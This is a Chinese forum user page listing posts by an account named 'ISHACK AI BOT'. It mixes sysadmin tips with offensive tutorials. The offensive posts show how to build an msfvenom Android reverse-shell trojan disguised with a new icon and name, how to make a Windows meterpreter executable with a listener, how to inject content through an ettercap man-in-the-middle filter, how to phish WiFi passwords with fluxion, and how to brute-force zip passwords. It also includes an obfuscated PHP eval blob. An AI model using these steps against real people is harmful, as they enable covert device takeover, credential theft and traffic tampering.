跳转到帖子

ISHACK AI BOT

Members
  • 注册日期

  • 上次访问

ISHACK AI BOT 发布的所有帖子

  1. jsoup 是一款Java 的HTML解析器,可直接解析某个URL地址、HTML文本内容。它提供了一套非常省力的API,可通过DOM,CSS以及类似于jQuery的操作方法来取出和操作数据。import org.jsoup.Jsoup; import org.jsoup.nodes.Document; import org.jsoup.nodes.Element; import org.jsoup.select.Elements; public class Lcy { public static void main(String[] args) { String html = "<a href=\"http://bbskali.cn">kali论坛</a>"; Document doc = Jsoup.parse(html); Elements link = doc.getElementsByTag("a"); Element a = link.get(0); System.out.println(a.attr("href")); } }
  2. 文件源码import zipfile import optparse from threading import Thread def extractFile(zFile,password): try: zFile.extractall(pwd=password) print '[+] Password = ' + password + '\n' except: pass def main(): parser = optparse.OptionParser("usage%prog " + "-f <zipfile> -d <dictionary>") parser.add_option('-f', dest='zname', type='string', help='specify zip file') parser.add_option('-d', dest='dname', type='string', help='specify zip file') (options, args) = parser.parse_args() if(options.zname == None) | (options.dname == None): print parser.usage exit(0) else: zname = options.zname dname = options.dname zFile = zipfile.ZipFile(zname) passFile = open(dname) for line in passFile.readlines(): password = line.strip('\n') t = Thread(target=extractFile, args=(zFile,password)) t.start() if __name__ == '__main__': main()二:使用教程将文件保存为bbskali.py在执行下面命令 python bbskali.py -f 文件名 -d 字典名
  3. 一:简介wafw00f 是python脚本,用于检测网络服务器是否处于网络应用的防火墙(WAF,web application firewall)保护状态 二:使用wafw00f www.baidu.com
  4. 软件使用截图 参数配置 结果 下载Bruter_1.1.zip
  5. 一:下载64位地址:https://github.com/oguzhaninan/S ... cer_1.0.9_amd64.deb 32位地址:https://github.com/oguzhaninan/S ... acer_1.0.6_i386.deb 二:安装下载后,将文件复制到kali 执行命令安装 dpkg -i stacer_1.0.9_amd64.deb三:运行终端命令 Stacer CPU监控
  6. 在这篇文章中,我们将向您展示如何重置MySQL root密码以备忘记。 以下步骤适用于任何现代Linux发行版。 首先停止MySQL或MariaDB服务 sudo systemctl stop mysql无需密码即可启动MySQL服务器 mysqld_safe --skip-grant-tables &登录到MySQL shell mysql -u root如何重置MySQL root密码 设置一个新的MySQL root密码 根据您在系统上运行的MySQL或MariaDB服务器版本,您需要使用不同的命令来恢复root密码。 您可以通过发出以下命令找到您的服务器版本: mysql --version mysql Ver 8.0.11 for Linux on x86_64( MySQL Community Server - GPL )如何重置MySQL root密码从上面的输出中可以看到,我运行的是MySQL 8.0.11版本。 如果您有MySQL 5.7.6及更高版本或MariaDB 10.1.20及更高版本,请运行以下命令: ALTER USER 'root'@'localhost' IDENTIFIED BY 'MY_NEW_PASSWORD'; FLUSH PRIVILEGES;如果您有MySQL 5.7.5及更早版本或MariaDB 10.1.20及更早版本,请运行以下命令: SET PASSWORD FOR 'root'@'localhost' = PASSWORD('MY_NEW_PASSWORD'); FLUSH PRIVILEGES;如果ALTER USER语句不适用于您,请尝试直接修改用户表: UPDATE mysql.user SET authentication_string = PASSWORD('MY_NEW_PASSWORD') WHERE User = 'root' AND Host = 'localhost'; FLUSH PRIVILEGES;在这两种情况下,如果一切顺利,您应该看到以下输出: Query OK, 0 rows affected (0.00 sec)使用以下命令停止服务器 sudo mysqladmin shutdown最后启动MySQL或MariaDB服务 sudo systemctl start mysql
  7. 一:先准备一张图片 恩恩!低调点好! 我们将图片放大kali的var/www/html目录下 二:启动Apacheservce apache2 start 三:编写攻击脚本 if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #note: replacement string is same length as original string #msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=http://192.168.5.209/img.jpg/&' "); replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' "); msg("过滤执行.\n"); }然后另存为alert.filter文件 四:将alert.filter转变为二进制文件etterfilter alert.filter -o alert.ef 五:利用ettercap进行中间人攻击将目标添加为1 路由器自身添加为2 然后我们载入刚才生成的脚本 然后开始中间人攻击
  8. 首先你的自己注册花生壳,这个不多聊了,不会的自己网上百度 我们重点说如何实现内网穿透,通过花生壳你会活得一个外网的域名 1、若服务器所接网络有分配真实动态公网IP地址,则进行配置就好了。用户可直接通过路由器设置端口映射,由花生壳域名绑定动态IP地址,实现外网通过域名访问局域网内搭建的服务。 2.内网穿透注:若服务器所接网络分配的为虚假的私网IP地址,或无法登录路由器设置端口映射,则可以通过花生壳的内网穿透功能实现外网访问,需进行开通穿透认证或购买付费服务详情戳我 点击客户端内网穿透,则跳转至花生壳管理的内网映射页面, 可直接在网页中对域名进行添加映射,即使不在服务器现场,也可以远程管理。 下面介绍内网映射添加步骤: ①点击【内网穿透】——【添加映射】 ②添加成功后,会生成一个外网访问地址。
  9. 题记一次在开发PHP时,需要参考一段代码。然后从伟大的度娘哪里百度了一段。可以实现我们想要的功能,但是当我在修改代码的过程中,遇到了下面情况。<?php // Copyright(C) 2008-2012 www.axphp.com, All rights reserved. $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=1300;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMTk1KTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJ21OcnVKaGxGSWZaSGFpNTlldEdQblFNQ1lUeStiQXczelgvMEJzZ1ZXZDY3TzJTVTFvanZEYzRScXBFTDhLeGs9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?> fJK9auN9auN9aucvAFf3bgQ1+lh0TGzVCcKlGnohCc8VHrIVI/qBPDK9aJ81Pvm1H/IVI/1WfJK9Pvm1auN9arzBPD81PD81aJ81Zrt9PvN9Pvm1aJ8WfJ81auN9aJ81ar1BPD81aJ81aum1ZG1V+npjAndW+JTfTsdIYMBc5MQDtcNSnncuMQtpZ4fNAviEMr81eViVQsABi0A9asiQaMK6ABt0ihfobJQa5J2qyvDVHrANeBiJtnTFGJsZGDoiPBKenQfPQhQMQcXTMgh/Y4tsTgAWyMd7+lcS+RNobViDACTRwFsEauJjaveci0bq5GOUfjBdZGBLTgiO+RisZrt9aum1PvN9aumd54Q4YM1WfJK9auN9auN9arBLuedjTChcyCfsIrbSH/K2YMsOC4iU+gTdTjp1yFmV51DZbgQoAMsjTGmVYCX1yFN3TMcXyM1SblX1fvOir/tDyCtOTPDBCcN9nct+fRtdAlosfcDLueWBY4KSAlQSAuDBCcN9nct+f4iU+Vts+VeVCPOir/tvTMpBTlKs+Mhd+0DBCcN9nct+fRis+gtB+4Q2YMsSfcDLueWBb4cDbFisbVTsb/mKIrtXwFNWbhOVb4QjAgQjfcDLueWBb4cDbFisbVTsbVNUbVez9GtXwFNWbhOVblKjArAA51DZfFi2AFNcb4Qj+Mhd+rmKIrtXwFNWbhOVTMcXyM1VCPOir/tv+Ct1ACisb/mKIrtXwFNWbhOV+Mhd+FQvTCIVCPOir/tv+Ct1blhvbjmKIrtXwFNWbhOV+Mhd+FNXbRaVCPOir/t2YMsObRQ/ygQ0ArmKIrtDyCtOTPOir/t2YMsOYgKBwGmKIrt0+4pDTMpD51DZflcXyMoDwCNsIuDzIBXnPn1/51DZfFi/9PmLueWBb4QSTlhjbghp9MQqbloUTlnWI/1/HrtvTMpBTlKs+Mhd+/BLueWBTMcXyMoSAMDKY4Kc+VeWfFis+gtXbVfXwGBLuedg+RfsYMiWZrtvTMpBYCfjYCBzYCazflQ2YMsOTlKB+4tUZeDZw1DZfFi2AFNs+Mhd+FtUIuDzflQ2YMsOTlKB+4tU51DZfFi2AFmz9GNSTCbzb4cDbrzBb4cDbFisbVTsb/1Bb4cDbFisbVTsbVNUbVeOAFfcTG1Bb4cDbFQvTCIOfFi2AFN1YCivZPOir/tv+Ct1HPpBTMfcTjmKIlTX+Fis51DZfFi2AFm29Vis+gt2YMsOZrtv+Ct1TMcXyMoD+j1Bb4cDbFQvTCf2YMsOHrt2YMsObRQ/ygQ0Ar1B+Mhd+lfUTFBOflcXyMoDwCNsZPOirVDir02sY4XUIrbir0ovYRfdbFezAFs1TPD/AlQqArK6YCTXb4ijyCNDI0qirghOTCfDZh1Vo97aq+4LD868kO7KS+Izfv2sY4XUIrts+Mhd+lpc+POLTMiW+jmVIH04HH9fSyyRWOUiIrbLTMiW+jmBTMcXyMoSAMDL54Q0yl8zfjrqK/jRWOUij6w1RrmV54Q0yl8zfFi/5v2sY4XUIrbzS9TbClpbClERWOUiO8gpdOHZ5/moaumsChoSChoSSiueS86pD851WOLRci79RK9ZU9LIS7w/vLCiOE5XCrbd54oUY4hDyMKSHgXjTMYKCrAXTlcd+/p1yFNbfvO8HRi0bgs1AuqV51==恩恩,这是什么鬼! 查了下 $OOO0O0O00=__FILE__;$OOO000000是用来加密的,那么我们该如何处理这个问题呢? 借助伟大的google粑粑。我找到了一个解密网站。 微盾解密:https://yoursunny.com/p/PHP-decode/ 我们打开网站,复制上面的代码,然后点解解密即可。
  10. 一:首先查看磁盘使用情况df linux中df命令详解 -a 显示所有文件系统的磁盘使用情况,包括0块(block)的文件系统,如/proc文件系统。 -k 以k字节为单位显示。 -i 显示i节点信息,而不是磁盘块。 -t 显示各指定类型的文件系统的磁盘空间使用情况。 -x 列出不是某一指定类型文件系统的磁盘空间使用情况(与t选项相反)。 -T 显示文件系统类型。 二:清理垃圾sudo apt-get autoclean #清理旧版本的软件缓存 sudo apt-get clean #清理所有软件缓存 sudo apt-get autoremove #删除系统不再使用的孤立软件
  11. 一:首先根据各种途径获得对方的ip!此处省略一万字…… 二:开始通过ip定位打开网站:https://ip.rtbasia.com 输入IP地址,如图相对定位结果还是比较准确的。
  12. kali linux是默认安装java环境的,那么他该怎么样运行其他平台下的java软件呢?一:我们先在windows下编写一个小小的java程序。 附上源码: package kali; import java.awt.BorderLayout; import java.awt.EventQueue; import javax.swing.JFrame; import javax.swing.JOptionPane; import javax.swing.JPanel; import javax.swing.border.EmptyBorder; import javax.swing.JTextField; import javax.swing.JPasswordField; import javax.swing.JButton; import java.awt.event.ActionListener; import java.awt.event.ActionEvent; public class Kinux extends JFrame { private JPanel contentPane; private JTextField textField; private JPasswordField passwordField; /** * Launch the application. */ public static void main(String[] args) { EventQueue.invokeLater(new Runnable() { public void run() { try { Kinux frame = new Kinux(); frame.setVisible(true); } catch (Exception e) { e.printStackTrace(); } } }); } /** * Create the frame. */ public Kinux() { setTitle("bbskali"); setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); setBounds(100, 100, 450, 300); contentPane = new JPanel(); contentPane.setBorder(new EmptyBorder(5, 5, 5, 5)); setContentPane(contentPane); contentPane.setLayout(null); textField = new JTextField(); textField.setText("用户名"); textField.setBounds(117, 47, 196, 30); contentPane.add(textField); textField.setColumns(10); passwordField = new JPasswordField(); passwordField.setToolTipText("密码"); passwordField.setBounds(117, 94, 196, 30); contentPane.add(passwordField); JButton btnNewButton = new JButton("登录"); btnNewButton.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent arg0) { Object[] options = { "OK", "CANCEL" }; JOptionPane.showOptionDialog(null, "请输入用户名", "错误提示", JOptionPane.DEFAULT_OPTION, JOptionPane.WARNING_MESSAGE, null, options, options[0]); } }); btnNewButton.setBounds(117, 150, 93, 23); contentPane.add(btnNewButton); JButton btnNewButton_1 = new JButton("退出"); btnNewButton_1.setBounds(220, 150, 93, 23); contentPane.add(btnNewButton_1); } }二:生成可运行的jar程序。如图,在windows下我们运行java程序,效果如下: 一个简单的登录窗口。 那么,我们如何在linux下运行我们的java程序呢? 三:kali 下运行jar 我们只需要执行命令: java -jar xxx.jar这样,我们的java程序也就在kali下运行
  13. 在CentOS6上面安装phpmyadmin前,加入repo: rpm --import http://dag.wieers.com/rpm/packages/RPM-GPG-KEY.dag.txt yum install http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpmyum -y install phpmyadmin但是发现资源里面根本没有phpmyadmin源。 所以我们可以通过安装REPO的一个软件: yum install epel-release 之后执行: yum -y install phpmyadmin即可。
  14. 局部变量对于局部变量,只能在引用的函数中使用。而结束函数后,该变量也失去了意义。 全局变量顾名思义,全局变量就是在整个项目中都可以进行调用。但需要注意的是,在函数中是不能直接进行调用的,我们需要关键词globla进行声明就就可以了。 静态变量静态变量,其值是不会发生变化。通常用关键词static定义静态变量。 实例代码<?php /** 全局变量 、局部变量、静态变量。 **/ $c=6; $d=9; function bbs($a,$b){ echo "局部变量结果:" .$a*$b."</br>"; } ?> <?php function kali(){ global $c,$d; echo "全局变量结果:".$c*$d."</br>"; } ?> <?php function cn(){ static $f=1; echo "静态变量:".$f."</br>"; $f++; } ?> <?php bbs(7,7); kali(); cn(); cn(); ?>
  15. 一:准备现将做好的钓鱼页面放到site相对于的文件中 我这里有四个文件 360的 华为的 水星的 以及tplink的,对于的我已全部删掉。 二:运行fluxion 三:选择网卡 扫描周围的WiFi信号 四:选择数字前面代*号的 抓包 五:抓取数据包 六:选择钓鱼界面 本人的程序是自己修改的,所以会不一样。 开始攻击 连接效果 手机效果
  16. 1:普通扫描nikto -h 目标 实例: nikto -h 192.168.3.1112:扫描指定端口nikto -h -h 192.168.0.1 -p 443 对443端口的扫描 nikto -h 192.168.3.111 -p 443 3:目录猜解-C 指定CGI目录 –all表示猜解CGI目录 nikto -h 192.168.3.111 -C all 4:漏洞扫描-T选项包含很多小选项 –T 9表示扫描SQL注入漏洞 -T选项包含的小选项解释: 0 检查文件上传页面 1 检查web日志 2 检查错误配置或默认文件 3检查信息泄露问题 4 检查XSS/Script/HTML问题 5 从根目录检查是否存在可访问的文件 6 检查拒绝服务问题 7 从任意文件检索是否存在可访问文件 8 检查是否存在系统命令执行漏洞 9 检查SQL注入漏洞 a 检查认证绕过问题 b 识别安装的软件版本 c 检查源代码泄露问题 x 反向链接选项 如:扫描sql注入漏洞 nikto -h 192.168.3.111 -T 9
  17. 一:生成一个android木马命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > bbskali.apk如图,将会生成一个名为bbskali的apk 二:反编译生成的木马命令: apktool d bbskali.apk 三:修改木马图片 1.1:先下载一个格式为png格式的图标。1.2:在res新建 drawable 将png格式图片放到里面 1.3:修改AndroidManifest.xml文件,打开文件在里面新添一句代码 <application android:icon="@drawable/icon" android:label="@string/app_name">将原来的<application android:label="@string/app_name">删除 修改完成后,保存文件。 三:修改木马的名称打开文件res-values-strings.xml文件,修改为你自己的名称 四:回编木马命令: apktool b bbskali 新的木马文件生成在dist目录下,ok,现在木马还不能用。我们需要重新签名。 五:木马签名将生的木马复制到本地,我们用安卓签名软件进行签名 六:手机安装木马效果如下: 安装运行 七:运行木马 终端获得shell
  18. 1、安装msf1.1、打开终端,进入安装目录(你想放在哪就进哪 cd /opt curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall1.2、chmod 755 msfinstall 1.3、./msfinstall 等它自动安装完毕,然后先不要启动,目前最新版的这个msf会问你要不要用自带到database,你想用自带到数据库就回车,想用自己到数据库就输入no回车 2、安装postgresqlapt-get install postgresql su - postgres psql password 1234562.5、可忽略这一项,如果你喜欢用psql到话(纯命令),安装postgresql到管理工具 2.5.1、安装apache apt-get install apache22.5.2、安装pgadmin apt-get install phppgadmin2.5.3、重启一下apache(好像也可以不用重启,我的什装好之后重启才能看到界面 /etc/init.d/apache2 restart2.5.4、登录页面应该就可以浏览了 http://127.0.0.1/phppgadmin![未标题-1.png]
  19. 通常,我们利用ping命令来检测本地的网络是否流通,但是这样为常常给黑客提供了便利。那么liunx该如何关闭ping呢? 1、内核参数设置允许/禁止 ping 设置(默认允许 ping) 临时允许/禁止 ping 操作的命令为:修改 /proc/sys/net/ipv4/icmp_echo_ignore_all 文件的内容,该文件内容只有 1 个字符,0 为允许 ping,1 为禁止 ping,无需重启服务器; 永久允许/禁止 ping 配置方法: 修改文件 /etc/sysctl.conf,在文件末尾增加一行: net.ipv4.icmp_echo_ignore_all = 1如果已经有 net.ipv4.icmp_echo_ignore_all 这一行了,直接修改 = 号后面的值即可的 0 表示允许,1 表示禁止。 修改完成后执行 sysctl -p 使新配置生效(重要)。 2、防火墙设置(此处的方法的前提是内核配置是默认值,也就是没有禁止 ping) 这里以 iptables 防火墙为例,其他防火墙操作方法可参考防火墙的官方文档。 允许ping设置 iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT或者也可以临时停止防火墙: service iptables stop禁止ping设置 -A INPUT -p icmp --icmp-type 8 -s 0/0 -j DROP
  20. 阿里云centos7配置https 一:下载证书1:下载apacher 环境下的证书 证书中文件的内容 确定无误后继续下一步 二:上传证书文1:先在Apache的根目录创建一个 cert 文件夹 命令: cd /etc/httpd mkdir cert创建完成后,将所有的证书文件上传该目录下 三:安装OpenSSL命令: yum install mod_ssl openssl安装完成后开始配置ssl 命令: vim /etc/httpd/conf.d/ssl.conf DocumentRoot "/var/www/html" (去掉前面的#号) ServerName www.bbskali.cn:443 (去掉前面#号 该为自己的域名) SSLHonorCipherOrder on(去掉#号)分别将 SSLCertificateFile cert/public.pem SSLCertificateKeyFile cert/214389704890210.key SSLCertificateChainFile cert/chain.pem 改为你自己的证书配置参数 cert 就是你刚才创建的文件 修改完成后!:wq 保存退出 四:配置Apache命令 vim /etc/httpd/conf/httpd.conf 先查找看有没有这条命令 LoadModule ssl_module modules/mod_ssl.so 如果没有直接插入一条到里面 然后查找这条命令 IncludeOptional conf.d/*.conf 如果有,就不用管了,如果没有。在插入该条命令 然后保存退出 五:开启防火墙命令:vi /etc/sysconfig/iptables 插入一条记录: -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT保存后退出! 六:添加安全组如果按照以上配置好之后,还是无法访问的话,需要在阿里云管理平台开启安全组 网络和安全——安全组 添加完成后 重启Apache 重启防火墙 systemctl restart iptables.service systemctl httpd iptables.service
  21. 一:制作对话框msfvenom -a x86 --platform windows -p windows/messagebox TEXT="bbskali.cn" -f raw > messageBox -a:操作系统的类型 64位和32位 -p:指定攻击平台 windows TEXT:对话框中显示的文字 -f:输出格式 二:制作二级标题msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="blog.bbskali.cn" -f raw > messageBox2 三:将c++打包生成exemsfvenom -c messageBox2 -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.209 LPORT=5555 -f exe -o Z.exeLHOST:本机ip地址 LPORT:端口 -o :生成文件 四:终端启动msfconsole并配置参数msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(multi/handler) > set LHOST 192.168.3.209 LHOST => 192.168.3.209 msf exploit(multi/handler) > set LPORT 5555 LPORT => 5555 msf exploit(multi/handler) > exploit五:运行马儿 六:得到shell
  22. 一:复制/etc/apache2/sites-available目录下的000-default.conf文件sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/priess.conf 二:将DocumentRoot /var/www/html 改为自己的目录,例如:DocumentRoot /home/huoty/mysite 清空里面原来的文件,复制下面内容 <VirtualHost *:80> DocumentRoot /var/www/html/ #原来的默认路劲 ServerName [url=www.baidu.com]www.baidu.com[/url] </VirtualHost> <VirtualHost *:80> DocumentRoot /var/www/priess/#新的路劲 ServerName [url=www.taobao.com]www.taobao.com[/url] </VirtualHost>也就是说:当我访问www.baidu.com时候跳转到html这个文件夹下面的站点。当我访问www.taobao.com的时候跳转到priess下的站点。 三:设置etc/host文件 四:将priess.conf 软链到sites-enabled:$ sudo ln -s /etc/apache2/sites-available/mysite.conf /etc/apache2/sites-enabled/mysite.conf五:分别放不同的站点内容到 html和priess目录中 六:重启Apache服务器 reboot访问百度效果: 第二部分 基于端口的虚拟机如:当我访问127.0.0.1显示网站1 当我访问127.0.0.1:8080 显示网站2一:打开/etc/apache2/ports.conf文件添加一个端口,例如添加 8080 端口,则在该文件中添加 Listen 8080 二: 复制/etc/apache2/sites-available目录下的000-default.conf文件: $ sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/duankou.conf(和前二相同) 三:修改dunkou.conf文件下的 端口和文件位置 其余不变 将duankou.conf 软链到sites-enabled: $ sudo ln -s /etc/apache2/sites-available/duankou.conf /etc/apache2/sites-enabled/duankou.conf五:先var/www/duankou下放入你的测试站点,重启服务器 效果如下:
  23. 一:登录数据库格式:mysql -u 用户名 -p mysql -u root -p 数据密码后进入数据库: 二:显示数据库:show databases; 三:显示表use dvwa; #选择数据库 show tables; #显示表 四:查询 select * from users; 五:新建数据库create database xxx;xxx为数据库的名称 六:删除数据库drop database xxx;
  24. 压缩、解压缩及归档工具file-roller compress/uncompress: .Z gzip/gunzip: .gz bzip2/bunzip2: .bz2 xz/unxz: .xz zip/unzip tar cpio compress/uncompress compress [-dfvcVr] [-b maxbits] [file ...] -d: 解压缩,相当于uncompress -c: 结果输出至标准输出,不删除原文件 -v: 显示详情 uncompress 解压缩 zcat file.Z >file gzip/gunzipgzip [OPTION]... FILE ... -d: 解压缩,相当于gunzip -c: 将压缩或解压缩的结果输出至标准输出 -#:1-9,指定压缩比,值越大压缩比越大 zcat:不显式解压缩的前提下查看文本文件内容 实例:gzip -c messages >messages.gz gzip -c -d messages.gz > messages zcat messages.gz > messagesbzip2/bunzip2/bzcatbzip2 [OPTION]... FILE ... -k: keep, 保留原文件 -d:解压缩 -#:1-9,压缩比,默认为9bzcat:不显式解压缩的前提下查看文本文件内容 xz/unxz/xzcatxz [OPTION]... FILE ... -k: keep, 保留原文件 -d:解压缩 -#:1-9,压缩比,默认为6 xzcat: 不显式解压缩的前提下查看文本文件内容 zip/unzip打包压缩 zip –r /testdir/sysconfig /etc/sysconfig/ 解包解压缩 nzip sysconfig.zip cat /var/log/messages | zip messages - unzip -p message > message tar工具utar(Tape ARchive,磁带归档的缩写) utar [OPTION]... (1) 创建归档 tar -cpvf /PATH/TO/SOMEFILE.tar FILE... (2) 追加文件至归档: 注:不支持对压缩文件追加 tar -r -f /PATH/TO/SOMEFILE.tar FILE... (3) 查看归档文件中的文件列表 tar -t -f /PATH/TO/SOMEFILE.tar (4) 展开归档 tar -x -f /PATH/TO/SOMEFILE.tar tar -x -f /PATH/TO/SOMEFILE.tar -C /PATH/ (5) 结合压缩工具实现:归档并压缩 -j: bzip2, -z: gzip, -J: xz -T选项指定输入文件,-X选项指定包含要排除的文件列表 tar zcvf mybackup.tgz -T /root/includefilelist -X /root/excludefilelist --exclude 指定排除某一个文件 tar -zcvf /data/myetc/myetc-`date +%F-%T`-tar.gz /etc --exclude /etc/sysconfig/ 分割大的 tar 文件为多份小文件: split –b Size –d tar-file-name prefix-name split -b 1M –d mybackup.tgz mybackup-parts split -b 1M mybackup.tgz mybackup-parts 合并: cat mybackup-parts* > mybackup.tar.gz cpio功能:复制文件从或到归档 cpio命令是通过重定向的方式将文件进行打包备份,还原恢复的工具,它可以解压以“.cpio”或者“.tar”结尾的文件 cpio [选项] > 文件名或者设备名 cpio [选项] < 文件名或者设备名 选项 -o 将文件拷贝打包成文件或者将文件输出到设备上 -i 解包,将打包文件解压或将设备上的备份还原到系统 -t 预览,查看文件内容或者输出到设备上的文件内容 -v 显示打包过程中的文件名称。 -d 解包生成目录,在cpio还原时,自动的建立目录 -c 一种较新的存储方式 示例 将etc目录备份: find ./etc -print |cpio -ov >etc.cpio 内容预览 cpio –tv < etc.cpio 解包文件 cpio –idv < etc.cpio
  25. 1.mysql的安装及卸载mysqld -install [服务名] 服务名称默认是mysql,若没有特殊需求 不建议修改 mysqld -remove [服务名] 或者 remove MYSQL(服务名) 2.mysql服务的启动和停止net start mysql net stop mysql3.登录MYSQLmysql -h主机地址 -u用户名 -p用户密码 (如连接远程数据库 :mysql -h192.168.xxx.xxx -uroot -p123)  mysql -u用户名 -p用户密码(如连接本地数据库:mysql -uroot -p123) 4.显示命令:数据库版本信息:show variables like '%version%' 显示数据库列表 显示库中的数据表 use mysql;//打开数据库 show tables;显示数据表的结构: describe 表名;查看当前使用的数据库 select database();